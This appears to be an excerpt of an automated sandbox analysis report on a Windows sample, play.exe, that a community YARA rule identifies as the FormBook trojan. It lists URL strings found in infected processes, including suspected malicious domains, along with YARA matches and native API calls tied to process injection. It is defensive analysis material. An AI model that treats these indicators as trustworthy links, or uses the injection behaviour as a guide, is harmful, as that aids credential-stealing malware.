Source: relog.exe, 00000005.00000002.4103860914.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Z9
Source: relog.exe, 00000005.00000002.4103860914.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: relog.exe, 00000005.00000003.2240887847.0000000007A04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: relog.exe, 00000005.00000002.4105196845.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2354562437.0000000033C54000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: relog.exe, 00000005.00000002.4105196845.0000000004A46000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000004066000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=rantup.com
Source: relog.exe, 00000005.00000002.4105196845.000000000508E000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.00000000046AE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BCD283 NtClose,	0_2_00BCD283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1C00 EntryPoint,NtProtectVirtualMemory,	0_2_00BA1C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2B60 NtClose,LdrInitializeThunk,	0_2_026D2B60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	0_2_026D2C70
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	0_2_026D2DF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D35C0 NtCreateMutant,LdrInitializeThunk,	0_2_026D35C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D4340 NtSetContextThread,	0_2_026D4340
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D4650 NtSuspendThread,	0_2_026D4650
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AF0 NtWriteFile,	0_2_026D2AF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AD0 NtReadFile,	0_2_026D2AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2AB0 NtWaitForSingleObject,	0_2_026D2AB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BE0 NtQueryValueKey,	0_2_026D2BE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BF0 NtAllocateVirtualMemory,	0_2_026D2BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2BA0 NtEnumerateValueKey,	0_2_026D2BA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2B80 NtQueryInformationFile,	0_2_026D2B80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2E30 NtWriteVirtualMemory,	0_2_026D2E30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2EE0 NtQueueApcThread,	0_2_026D2EE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2EA0 NtAdjustPrivilegesToken,	0_2_026D2EA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2E80 NtReadVirtualMemory,	0_2_026D2E80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F60 NtCreateProcessEx,	0_2_026D2F60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F30 NtCreateSection,	0_2_026D2F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FE0 NtCreateFile,	0_2_026D2FE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FA0 NtQuerySection,	0_2_026D2FA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2FB0 NtResumeThread,	0_2_026D2FB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2F90 NtProtectVirtualMemory,	0_2_026D2F90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C60 NtCreateKey,	0_2_026D2C60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2C00 NtQueryInformationProcess,	0_2_026D2C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CF0 NtOpenProcess,	0_2_026D2CF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CC0 NtQueryVirtualMemory,	0_2_026D2CC0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2CA0 NtQueryInformationToken,	0_2_026D2CA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D30 NtUnmapViewOfSection,	0_2_026D2D30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D00 NtSetInformationFile,	0_2_026D2D00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2D10 NtMapViewOfSection,	0_2_026D2D10
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DD0 NtDelayExecution,	0_2_026D2DD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2DB0 NtEnumerateKey,	0_2_026D2DB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3010 NtOpenDirectoryObject,	0_2_026D3010
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3090 NtSetValueKey,	0_2_026D3090
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D39B0 NtGetContextThread,	0_2_026D39B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3D70 NtOpenThread,	0_2_026D3D70
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D3D10 NtOpenProcessToken,	0_2_026D3D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03284340 NtSetContextThread,LdrInitializeThunk,	5_2_03284340
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03284650 NtSuspendThread,LdrInitializeThunk,	5_2_03284650
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282B60 NtClose,LdrInitializeThunk,	5_2_03282B60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_03282BA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_03282BE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_03282BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AF0 NtWriteFile,LdrInitializeThunk,	5_2_03282AF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AD0 NtReadFile,LdrInitializeThunk,	5_2_03282AD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F30 NtCreateSection,LdrInitializeThunk,	5_2_03282F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FB0 NtResumeThread,LdrInitializeThunk,	5_2_03282FB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FE0 NtCreateFile,LdrInitializeThunk,	5_2_03282FE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_03282E80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_03282EE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_03282D30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_03282D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03282DF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DD0 NtDelayExecution,LdrInitializeThunk,	5_2_03282DD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C60 NtCreateKey,LdrInitializeThunk,	5_2_03282C60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_03282C70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_03282CA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032835C0 NtCreateMutant,LdrInitializeThunk,	5_2_032835C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032839B0 NtGetContextThread,LdrInitializeThunk,	5_2_032839B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282B80 NtQueryInformationFile,	5_2_03282B80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282AB0 NtWaitForSingleObject,	5_2_03282AB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F60 NtCreateProcessEx,	5_2_03282F60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282FA0 NtQuerySection,	5_2_03282FA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282F90 NtProtectVirtualMemory,	5_2_03282F90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282E30 NtWriteVirtualMemory,	5_2_03282E30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282EA0 NtAdjustPrivilegesToken,	5_2_03282EA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282D00 NtSetInformationFile,	5_2_03282D00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282DB0 NtEnumerateKey,	5_2_03282DB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282C00 NtQueryInformationProcess,	5_2_03282C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CF0 NtOpenProcess,	5_2_03282CF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03282CC0 NtQueryVirtualMemory,	5_2_03282CC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283010 NtOpenDirectoryObject,	5_2_03283010
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283090 NtSetValueKey,	5_2_03283090
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283D10 NtOpenProcessToken,	5_2_03283D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03283D70 NtOpenThread,	5_2_03283D70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9200 NtCreateFile,	5_2_008D9200
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9370 NtReadFile,	5_2_008D9370
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9470 NtDeleteFile,	5_2_008D9470
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9510 NtClose,	5_2_008D9510
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008D9680 NtAllocateVirtualMemory,	5_2_008D9680
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310F197 NtQueryInformationProcess,	5_2_0310F197

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB91E3	0_2_00BB91E3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1990	0_2_00BA1990
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA31D0	0_2_00BA31D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BCF933	0_2_00BCF933
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA3AF0	0_2_00BA3AF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0A3A	0_2_00BB0A3A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0A43	0_2_00BB0A43
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB73C3	0_2_00BB73C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BAECE3	0_2_00BAECE3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA1C00	0_2_00BA1C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB0C63	0_2_00BB0C63
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA35B0	0_2_00BA35B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA35A7	0_2_00BA35A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2DD0	0_2_00BA2DD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2DC8	0_2_00BA2DC8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027202C0	0_2_027202C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A352	0_2_0275A352
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027603E6	0_2_027603E6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02728158	0_2_02728158
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690100	0_2_02690100
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273A118	0_2_0273A118
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027581CC	0_2_027581CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027541A2	0_2_027541A2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027601AA	0_2_027601AA
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BC6E0	0_2_026BC6E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4750	0_2_026C4750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269C7C0	0_2_0269C7C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02752446	0_2_02752446
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744420	0_2_02744420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274E4F6	0_2_0274E4F6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02760591	0_2_02760591
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275AB40	0_2_0275AB40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02756BD7	0_2_02756BD7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A2840	0_2_026A2840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AA840	0_2_026AA840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE8F0	0_2_026CE8F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026868B8	0_2_026868B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276A9A6	0_2_0276A9A6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0E59	0_2_026A0E59
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275EE26	0_2_0275EE26
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275EEDB	0_2_0275EEDB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275CE93	0_2_0275CE93
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2E90	0_2_026B2E90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714F40	0_2_02714F40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02742F30	0_2_02742F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E2F28	0_2_026E2F28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0F30	0_2_026C0F30
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692FC8	0_2_02692FC8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271EFA0	0_2_0271EFA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0C00	0_2_026A0C00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690CF2	0_2_02690CF2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740CB5	0_2_02740CB5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AAD00	0_2_026AAD00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273CD1F	0_2_0273CD1F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269ADE0	0_2_0269ADE0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B8DBF	0_2_026B8DBF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027412ED	0_2_027412ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BD2F0	0_2_026BD2F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BB2C0	0_2_026BB2C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A52A0	0_2_026A52A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268D34C	0_2_0268D34C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275132D	0_2_0275132D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E739A	0_2_026E739A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F0E0	0_2_0275F0E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027570E9	0_2_027570E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A70C0	0_2_026A70C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274F0CC	0_2_0274F0CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D516C	0_2_026D516C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268F172	0_2_0268F172
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276B16B	0_2_0276B16B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AB1B0	0_2_026AB1B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E5630	0_2_026E5630
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027516CC	0_2_027516CC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F7B0	0_2_0275F7B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02691460	0_2_02691460
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275F43F	0_2_0275F43F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757571	0_2_02757571
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027695C3	0_2_027695C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273D5B0	0_2_0273D5B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02713A6C	0_2_02713A6C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757A46	0_2_02757A46
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FA49	0_2_0275FA49
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274DAC6	0_2_0274DAC6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E5AA0	0_2_026E5AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02741AA3	0_2_02741AA3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273DAAC	0_2_0273DAAC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FB76	0_2_0275FB76
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02715BF0	0_2_02715BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026DDBF9	0_2_026DDBF9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BFB80	0_2_026BFB80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270D800	0_2_0270D800
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A38E0	0_2_026A38E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A9950	0_2_026A9950
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BB950	0_2_026BB950
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02735910	0_2_02735910
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A9EB0	0_2_026A9EB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FF09	0_2_0275FF09
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02663FD5	0_2_02663FD5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02663FD2	0_2_02663FD2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FFB1	0_2_0275FFB1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A1F92	0_2_026A1F92
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02719C32	0_2_02719C32
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275FCF2	0_2_0275FCF2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02757D73	0_2_02757D73
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A3D40	0_2_026A3D40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02751D5A	0_2_02751D5A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BFDC0	0_2_026BFDC0
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039706E5	4_2_039706E5
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0399138F	4_2_0399138F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397073F	4_2_0397073F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039726BF	4_2_039726BF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03978E1F	4_2_03978E1F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03972496	4_2_03972496
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397249F	4_2_0397249F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0397AC3F	4_2_0397AC3F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330A352	5_2_0330A352
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325E3F0	5_2_0325E3F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033103E6	5_2_033103E6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F0274	5_2_032F0274
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032D02C0	5_2_032D02C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03240100	5_2_03240100
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032EA118	5_2_032EA118
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032D8158	5_2_032D8158
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033041A2	5_2_033041A2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033101AA	5_2_033101AA
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033081CC	5_2_033081CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032E2000	5_2_032E2000
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250770	5_2_03250770
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03274750	5_2_03274750
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324C7C0	5_2_0324C7C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326C6E0	5_2_0326C6E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250535	5_2_03250535
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03310591	5_2_03310591
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F4420	5_2_032F4420
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03302446	5_2_03302446
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FE4F6	5_2_032FE4F6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330AB40	5_2_0330AB40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03306BD7	5_2_03306BD7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324EA80	5_2_0324EA80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03266962	5_2_03266962
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032529A0	5_2_032529A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0331A9A6	5_2_0331A9A6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03252840	5_2_03252840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325A840	5_2_0325A840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032368B8	5_2_032368B8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0327E8F0	5_2_0327E8F0
